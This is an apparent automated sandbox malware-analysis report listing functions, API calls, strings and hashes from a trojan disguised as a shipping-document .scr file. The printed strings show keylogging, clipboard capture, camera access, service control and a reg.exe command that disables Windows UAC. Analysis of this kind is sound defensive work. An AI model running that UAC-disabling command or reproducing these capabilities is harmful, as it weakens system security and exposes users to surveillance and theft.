                                                      • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                      • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                      Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • BG, xrefs: 00406909
                                                      • (CG, xrefs: 0040693F
                                                      • C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, xrefs: 00406927
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (CG$C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$BG
                                                      • API String ID: 0-1691816846
                                                      • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                      • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                      • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                      • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                      Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __allrem.LIBCMT ref: 00439789
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                      • __allrem.LIBCMT ref: 004397BC
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                      • __allrem.LIBCMT ref: 004397F1
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                      • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                      • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                      • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                      Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                      • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                      • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                      • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                      Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3509577899-3206640213
                                                      • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                      • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                      • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                      • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                      Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                        • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologSleep
                                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                      • API String ID: 3469354165-462540288
                                                      • Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                      • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                      • Opcode Fuzzy Hash: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                      • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                      Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                      • String ID:
                                                      • API String ID: 493672254-0
                                                      • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                      • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                      • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                      • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                      Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                      • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                      • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                      • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                      • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                      Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                      • _free.LIBCMT ref: 00446EF6
                                                      • _free.LIBCMT ref: 00446F1E
                                                      • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                      • _abort.LIBCMT ref: 00446F3D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                      • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                      • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                      • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                      Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                      • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                      • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                      • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                      Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                      • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                      • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                      • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                      Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                      • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                      • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                      • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                      Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Enum$InfoQueryValue
                                                      • String ID: [regsplt]$DG
                                                      • API String ID: 3554306468-1089238109
                                                      • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                      • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                      • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                      • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                      Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                        • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                        • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                      • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                        • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                        • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                      • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                      • API String ID: 2974294136-753205382
                                                      • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                      • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                      • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                      • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                      Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • wsprintfW.USER32 ref: 0040A905
                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EventLocalTimewsprintf
                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                      • API String ID: 1497725170-248792730
                                                      • Opcode ID: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                      • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                      • Opcode Fuzzy Hash: d47f6fbfcddc5f950be7bc6af301cd0dd5aecde9aff08f33bdbb9e4de45e3f1a
                                                      • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                      Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                      • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                      • String ID: `AG
                                                      • API String ID: 1958988193-3058481221
                                                      • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                      • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                      • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                      • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                      Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                      • GetLastError.KERNEL32 ref: 0041CA91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                      • String ID: 0$MsgWindowClass
                                                      • API String ID: 2877667751-2410386613
                                                      • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                      • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                      • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                      • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                      Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                      • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                      • CloseHandle.KERNEL32(?), ref: 00406A14
                                                      Strings
                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                      • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$CreateProcess
                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                      • API String ID: 2922976086-4183131282
                                                      • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                      • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                      • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                      • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                      Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                      • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                      • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                      • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                      Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
